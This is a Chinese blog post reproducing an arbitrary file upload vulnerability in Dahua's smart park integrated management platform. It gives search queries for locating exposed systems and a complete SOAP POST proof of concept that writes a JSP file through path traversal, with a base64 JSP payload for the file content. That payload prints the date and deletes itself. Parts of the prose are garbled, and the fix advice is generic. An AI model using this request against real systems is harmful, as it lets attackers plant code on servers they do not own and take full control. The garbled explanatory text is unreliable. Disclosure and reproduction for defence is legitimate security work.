Advertisement

【漏洞复现】大华智慧园区综合管理平台前台任意文件上传漏洞

阅读量:

文章目录

  • 前言
  • 声明
  • 一、简介
  • 二、影响范围
  • 三、资产搜索
  • 四、漏洞测试
  • 四、修复建议

前言

该系统存在文件任意上传功能,在遭受特定注入攻击时可迫使系统暴露关键数据;攻击者可借助特定注入工具迫使系统暴露关键数据;从而实现对该系统的完全控制权

声明

避免在文章中提及的技术用于非法测试活动。因传播、利用本文提供的信息或工具而导致的所有直接或间接的后果及损失完全由使用方自身承担。此篇文章仅限于学习目的而提供。

一、简介

大华智慧园区综合管理平台是由大华技术股份有限公司开发的一种智能化园区综合管理系统。该系统主要目的是通过提升管理人员的工作效率与安全性、优化资源配置,并实现园区业务的智能化运行。该系统采用模块化设计与开放架构,并根据各类园区的具体需求提供定制化服务及扩展功能。此外,它支持云端部署以及移动端访问功能,使管理人员能够随时查看与监控园区运营状况。

二、影响范围

复制代码
    大华智慧园区综合管理平台
    
    
      
    
    代码解读
在这里插入图片描述

三、资产搜索

  • app="dahua-智慧园区综合管理平台"
  • body="/WPMS/asset/lib/gridster/"

四、漏洞测试

该漏洞的利用入口位于.../emap/webservice/gis/soap/poi$接口位置。当访问该接口并接收到以下响应内容时,即可判断该漏洞的存在性。

在这里插入图片描述

POC:

复制代码
    POST /emap/webservice/gis/soap/poi HTTP/1.1
    Host: XX.XX.XX.XX:8009
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
    Cookie: JSESSIONID=A58962636D1422B038BF985177F4C02E; JSESSIONID=ADE54516354577F1C8F8208580883BA2
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1378
    
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/">
       <soapenv:Header/>
       <soapenv:Body>
      <res:uploadPicFile>
         <arg0>/../../xxx.jsp</arg0>
         <arg1>
    		XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
    		</arg1>
      </res:uploadPicFile>
       </soapenv:Body>
    </soapenv:Envelope>
    
    
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
      
    
    代码解读

在所述流程图(POC)中,请注意arg0表示我们用于访问上传文件的地址这一项信息;而arg1则代表上传文件的具体内容。具体而言,在时间维度上进行举例说明:例如,在某个时间段内

PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPgo8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZCBISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKTsKZmlsZS5kZWxldGUoKTsKJT4=

将该部分内容放在arg1中

在这里插入图片描述

访问URL地址:http://url/upload/***.jsp

在这里插入图片描述

四、修复建议

  1. 实施网络安全漏洞修复措施。
  2. 对网络访问行为进行严格的控制措施

全部评论 (0)

还没有任何评论哟~